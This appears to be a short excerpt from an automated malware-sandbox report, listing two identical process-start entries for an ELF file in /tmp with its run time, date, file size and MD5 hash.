                  Start time:17:46:56
                  Start date:20/03/2023
                  Path:/tmp/k8CCRUs7Yi.elf
                  Arguments:n/a
                  File size:4956856 bytes
                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
                  Start time:17:46:56
                  Start date:20/03/2023
                  Path:/tmp/k8CCRUs7Yi.elf
                  Arguments:n/a
                  File size:4956856 bytes
                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1